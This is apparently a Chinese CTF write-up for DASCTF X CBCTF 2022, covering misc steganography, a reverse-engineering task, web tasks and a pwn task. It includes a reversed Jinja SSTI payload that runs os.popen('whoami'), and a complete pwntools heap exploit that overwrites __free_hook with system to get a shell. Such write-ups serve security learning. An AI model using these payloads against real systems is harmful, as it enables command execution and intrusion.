BBBB WRITEUP

MISC
- easy_keyboard
- Sign_in
- ezflow
- Mask
Reverse
- landing
web
- dino3d
- Text Reverser
PWN
- ez_note

MISC

easy_keyboard

开局一个按键精灵文件，直接strings secret.Q |grep KeyDown
然后照着打就行了，三个key
6E187BEF 323D1A4B F067EC94

然后输进去右边那个锁点一下就揭秘了，获得流量
直接knm拿下就完了

奇怪子，猜测是根据上下左右画图了，然后画一下
先把0-1对应的画图弄出来，转出来后可以看见空格，空格就是间隔，然后颅内绘画找一下数组对应关系，写脚本呢

import turtle
import libnum
file = open("output.txt", "rb")
lines = file.readlines()
lines = [lines.split() for lines in lines]
draws = ["622488","22","62426","624624","26822","642624","22684","622","62426848","622848"]
chars = ["0","1","2","3","4","5","6","7","8","9"]
l1 = ""for i in lines:state = str(i)[7:9]#根据上下左右画图if state == "00":l1+=" "elif state == "52":l1+="8"elif state == "51":l1+="2"elif state == "50":l1+="4"elif state == "4f":l1+="6"ans = ""for i in l1.split(" "):ans += chars[draws.index(i)]print(libnum.n2s(int(ans)))print(ans)

Sign_in

神秘的脑洞题
开局一个文件，直接反转，获得word文件
歌词，但是单词残缺，还有维吉尼亚，姑且猜测是爆破，先找一下原歌词，百度一下就能找到，进行一个diff

把残缺歌词的单词整理出来，忽略大小写，和zoo
获得hylqeygvs，然后尬住了。但是先维吉尼亚下，由于标题最开始有个-，猜测是歌手名作为密钥，也就是TREX变换一下
ohhtlhcyz
感觉有点东西，至少前四个应该是ohhh然后后面的ct有了yz还不确定
猜测应该是对这个数据进行了排序。。
但是懒得写爆破脚本，结合现有信息脑洞一下。
最终结果肯定是OHHH*****，这里我选择偷鸡，直接进行一个爆破后五位然后对比md5

import hashlibfile = open("../superdic.txt", "rb")
lines = file.readlines()
lines = [lines.split() for lines in lines]str1 ="OHHH"
for i in lines:str2 = str1+str(i)[3:-2]#如果str2的md5前四位是5613，就输出str2if hashlib.md5(str2.encode("utf-8")).hexdigest()[0:4] == "5613":print(str2)

结果比较多，但是还是一眼丁真，发现为CBCTF,然后加个md5交上去就行了

ezflow

mqtt协议分析，嗯造直接发现数据集，先进行一个提取。
观察一下数据，发现从0x7f开始一直有c2和c3出现，google搜了一下，

特性了属于是，反正如果是C2就直接删除，如果C3，就把C3后面的+0x40，并删除C3
按照这个逻辑进行整理，然后根据提示，发现每个数据都是八位ascii码，先转为七位，然后转换可以获得一个base64，解密后是压缩包，有加密，再结合前面的数据可以发现原始数据的c2c3的ascii最高位都是1，猜测进行了隐写，转换为01八位一组获得密码
脚本如下，不同数据对应不同输出(压缩包，b64，高位隐写都在里面了)

import tqdm
str1 = "000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f"
str2= "c280,c281,c282,c283,c284,c285,c286,c287,c288,c289,c28a,c28b,c28c,c28d,c28e,c28f,c290,c291,c292,c293,c294,c295,c296,c297,c298,c299,c29a,c29b,c29c,c29d,c29e,c29f,c2a0,c2a1,c2a2,c2a3,c2a4,c2a5,c2a6,c2a7,c2a8,c2a9,c2aa,c2ab,c2ac,c2ad,c2ae,c2af,c2b0,c2b1,c2b2,c2b3,c2b4,c2b5,c2b6,c2b7,c2b8,c2b9,c2ba,c2bb,c2bc,c2bd,c2be,c2bf,c380,c381,c382,c383,c384,c385,c386,c387,c388,c389,c38a,c38b,c38c,c38d,c38e,c38f,c390,c391,c392,c393,c394,c395,c396,c397,c398,c399,c39a,c39b,c39c,c39d,c39e,c39f,c3a0,c3a1,c3a2,c3a3,c3a4,c3a5,c3a6,c3a7,c3a8,c3a9,c3aa,c3ab,c3ac,c3ad,c3ae,c3af,c3b0,c3b1,c3b2,c3b3,c3b4,c3b5,c3b6,c3b7,c3b8,c3b9,c3ba,c3bb,c3bc,c3bd,c3be,c3bf"
#str1两两一组存入列表
list1 = [str1[i:i+2] for i in range(0, len(str1), 2)]
list2 = str2.split(',')
#列表合并
for i in range(len(list2)):list1.append(list2[i])#对照表从00-ff
list3 = []
for i in range(0x100):list3.append(hex(i)[2:])file = open("ffff.txt",'r')
str3 = file.read()
list4 = str3.split(' ')list5=[]
list8 = []for i in range(len(list4)):if list4[i-1] =='C2':continueif list4[i-1]=='C3':continueif list4[i] == 'C2':list5.append(list4[i+1])list8.append(1)elif list4[i] == 'C3':#十六进制+0x40list5.append(hex(int(list4[i+1],16)+0x40)[2:])list8.append(1)else:list5.append(list4[i])list8.append(0)#list5内容转为二进制
list6 = []
str5= ""
for i in range(len(list5)-1):list6.append(bin(int(list5[i],16))[2:].zfill(8))#提取后七位list6[i] = list6[i][1:]#list6转为字符串
str4 = ''
for i in range(len(list6)):str4 += chr(int(list6[i],2))# print(str4)#list8转为字符串
str6 = ''
for i in range(len(list8)):str6 += str(list8[i])#str6转为字符
str7 = ''
for i in range(0,len(str6),8):str7 += chr(int(str6[i:i+8],2))print(str7)

获得密码：pwd:@Dsy$r0aE.SR[42f*#
解压压缩包，发现一个jpg，猜测是steghide，还是用上面的密码，获得flag
DASCTF{d582abc0559138c5697c21d74726cf78}

Mask

高级隐写
010，末尾发现rar

应该是不同掩码的运算规则，先记一下。
然后对每个扫码都是可以扫的，是数字，没啥用，最终结果肯定不是这个
然而也无从下手，猜测有位置可以判断是什么mask

很好，在每个图片的r0通道左上角可以发现。先存一下，是四位二进制，刚好16个掩码的数据
按照其规律，去掉掩码，再按照原本的数据恢复掩码即可
脚本

Python
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt# 二维码转成数组
def read_data(pic):p = np.array(Image.open(pic).convert('L'))pic_data = []for y in range(40,250,10):for x in range(40,250,10):pic_data.append(p[y,x]//255)return np.array(pic_data).reshape(21,21)#读掩码
def read_yanma(pic):p = np.array(Image.open(pic).convert('RGB'))R = p[:,:,0]data = R[0,:4]%2return int("".join([str(i) for i in data]),2)#掩码操作
def deal1(data,yanma):if yanma == 0:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i+j) % 2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 1:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= j % 2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 2:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= i % 3data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 3:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i+j) % 3data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 4:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i//3+j//2)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 5:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i*j)%3+(i*j)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 6:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= ((i*j)%3+i*j)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 7:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= ((i*j)%3+i+j)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 8:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i*j) % 2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 9:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i*j) % 3data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 10:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i^j) % 3data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 11:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i^j) % 2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 12:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i//3+j//2)%3data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 13:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= (i^j)%3+(i^j)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 14:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= ((i^j)%3+i^j)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()elif yanma == 15:y,x = data.shapepoint = data[0:7,0:7].copy()for i in range(y):for j in range(x):data[i,j] ^= ((i^j)%3+i+j)%2data[0:7,0:7] = pointdata[0:7,-7:] = pointdata[-7:,0:7] = pointplt.imshow(data)plt.show()data = read_data('2.png')
yanma = read_yanma('2.png')
deal1(data,yanma)

然后扫码发现数值是0-131的数据，猜测是排序，然后再把掩码数据提取，八位一组，排序转换即可获得flag

Reverse

landing

输入flag先经过逐字节xor 0x22，然后每位都+1,进入func1

将已经加密过的flag再进行base64加密，与“TFd+TFJ+RH5FREpIfkVPREZ+S0RLREtES0RLRA==”进行比较，然后就结束了？？怎么可能这么简单，我们tab键观察程序的流程图，发现了异常处理
经过调试可以发现func2是会触发异常的，但是我们分析后得出这里并没有真正的处理flag的逻辑

返回主函数看看流程图

发现了异常处理，而且右下角那一块看上去像一个base64字符串

这里是真正的函数逻辑，现在我们动调看看，我是直接把fun2给nop了，然后直接跳转到密文字符串赋值的位置

nop掉fun2
直接跳转到异常处理的位置

这个大循环是把密文逐字节进行xor 0x12

s=[   0x47, 0x55, 0x77, 0x5C, 0x44, 0x7E, 0x55, 0x48, 0x47, 0x23,0x6B, 0x59, 0x47, 0x7E, 0x7F, 0x42, 0x41, 0x23, 0x7B, 0x51,0x4A, 0x54, 0x28, 0x5C, 0x41, 0x20, 0x7B, 0x42, 0x47, 0x7E,0x24, 0x42, 0x47, 0x7E, 0x24, 0x42, 0x47, 0x7A, 0x2F, 0x2F]
for i in range(len(s)-2):print(chr((s[i]^0x12)),end="")
#UGeNVlGZU1yKUlmPS1iCXF:NS2iPUl6PUl6PUh

跳出循环后，会遇到一个nothing函数

rcx是参数1为空，rdx是我们之前输入flag经过xor 0x22 +1后的值，也就是说前面的base64我们也没有用上

nothing里面是有花指令的，我们把CAL的机器码E8给nop掉

这是一个base64，魔改的地方是每次索引Base表后都会将得到的字符进行+1

最后的CMP环节，可以看到对比的密文就是我们上面求得UGeNVlGZU1yKUlmPS1iCXF:NS2iPUl6PUl6PUh ，我们现在需要将这个字符串先逐字节-1，得到真正的base64编码

s=[   0x47, 0x55, 0x77, 0x5C, 0x44, 0x7E, 0x55, 0x48, 0x47, 0x23,0x6B, 0x59, 0x47, 0x7E, 0x7F, 0x42, 0x41, 0x23, 0x7B, 0x51,0x4A, 0x54, 0x28, 0x5C, 0x41, 0x20, 0x7B, 0x42, 0x47, 0x7E,0x24, 0x42, 0x47, 0x7E, 0x24, 0x42, 0x47, 0x7A, 0x2F, 0x2F]
for i in range(len(s)-2):print(chr((s[i]^0x12)-1),end="")
print("\n")
#TFdMUkFYT0xJTklOR0hBWE9MR1hOTk5OTk5OTg

网站直接解开LWLRAXOLININGHAXOLGXNNNNNNNN

t="LWLRAXOLININGHAXOLGXNNNNNNNN"for i in range(len(t)):print(chr(((ord(t[i])-1)^0x22)),end="")
#itisbulijojodebuliduoooooooo

web

dino3d

直接控制台score.score=10000000（要求的分数）
然后自杀即可

Text Reverser

}% )“)(daer.)‘imaohw’(nepop.)‘so’(tropmi”(]‘lave’[]‘snitliub’[slabolg.tini.]312[)(sessalcbus.]0[sesab.ssalc.)( tnirp %{
命令执行，后面过滤了cat和flag，随便绕一下就行了，懒得贴了

PWN

ez_note

add函数类型转换可以绕过size检查，造成堆溢出，改size使堆块重叠劫持tcache链表，改free_hook为system

Python
from pwn import *context.log_level = 'debug'
context.arch='amd64'local=1
binary_name='pwn'
libc_name='libc-2.31.so'libc=ELF("./"+libc_name)
elf=ELF("./"+binary_name)if local:p=process("./"+binary_name)
else:p=remote('127.0.0.1',9999)ru=lambda x:p.recvuntil(x)
sl=lambda x:p.sendline(x)
sd=lambda x:p.send(x)
sa=lambda a,b:p.sendafter(a,b)
sla=lambda a,b:p.sendlineafter(a,b)
ia=lambda :p.interactive()def leak_address():if(context.arch=='i386'):return u32(p.recv(4))else :return u64(p.recv(6).ljust(8,b'\x00'))def cho(num):sl(str(num))def add(size,con):cho(1)sa('size:',str(size))sa('content:',con)def show(idx):cho(3)sa("ID:",str(idx))def delete(idx):cho(2)sa("ID:",str(idx))def exp():add(0x80,'idx0')add(0x80,'idx1')add(0x200,'idx2')add(0x200,'idx3')add(0x80,'idx4')delete(0)payload='A'*0x80+p64(0)+p64(0x4B1)add(0x100000080,payload)delete(1)add(0x80,'idx1')show(2)ru('Note content:')libc_base=leak_address()-0x1ebbe0system=libc_base+libc.sym['system']free_hook=libc_base+libc.sym['__free_hook']add(0x400,'idx5')delete(1)payload='A'*0x80+p64(0)+p64(0x211)add(0x100000080,payload) # 1delete(3)delete(2)delete(1)payload='A'*0x80+p64(0)+p64(0x211)+p64(free_hook)add(0x100000080,payload)add(0x200,'/bin/sh\x00')add(0x200,p64(system))delete(2)ia()exp()

DASCTF X CBCTF 2022九月挑战赛 WriteUp相关推荐

DASCTF X CBCTF 2022九月挑战赛 appetizer
程序分析开启了沙盒ban了execve fun函数可以覆盖到rbp的位置 check函数会检查该位置是否有下面的字符串,小端序记得反过来写白给了程序的一个地址(end),通过减去偏移拿到程序的基地 ...
DASCTF X GFCTF 2022十月挑战赛学习记录
这个比赛一向是大佬们的施展空间,哈哈哈我们就是混混.. 这里有点难受web一个没搞出来,misc搞出来两个... 滴滴图给了一个压缩包解出来有两个文件 zip有密码使用,ARCHPR放到后台先破解破 ...
DASCTF X GFCTF 2022十月挑战赛-hade_waibo
这是一个非预期解,但是得到出题人的赞许,莫名开心,哈哈: cancan need处存在任意文件读取 <!DOCTYPE html> <html lang="en" ...
DASCTF x CBCTF 2022_Crypto复现
DASCTF x CBCTF 2022_Crypto复现 easySignin P r o b l e m Problem Problem A n a l y s i s Analysis Analy ...
XSS挑战赛--Writeup（共16题）
XSS挑战赛--Writeup(共16题) Level-1 Level-2 Level-3 Level-4 Level-5 Level-6 Level-7 Level-8 Level-9 Level- ...
【ByteCTF 2022】Crypto Writeup
ByteCTF 2022 密码 Crypto writeup Choose_U_flag Compare Card Shark 文章目录 1. Choose_U_flag 题目分析初始化参数加密过 ...
用最好的“积木”，在元宇宙中掀起一场头脑风暴吧！丨RTE 2022 编程挑战赛圆满收官...
9月 17 日,由声网.环信与 RTE 开发者社区联合主办的「RTE 2022 编程挑战赛」圆满落幕.从 300+ 支参赛队伍中冲出重围的 27 支决赛队伍,在元宇宙中用精彩的答辩掀起了一场头脑风暴, ...
【2022羊城杯WriteUp By EDISEC】
2022羊城杯WriteUp By EDISEC Web little_db Safepop rce_me step_by_step-v3 ComeAndLogin simple_json Misc ...
DASCTF九月挑战赛复现-web
web dino3d 进入题目先小玩一把发现只要玩够这么多分就行,看看源码中的信息在别的地方都没有信息,在一个js文件中好像有checkcode,进去看一下/js/build.min.js?pat ...

DASCTF X CBCTF 2022九月挑战赛 WriteUp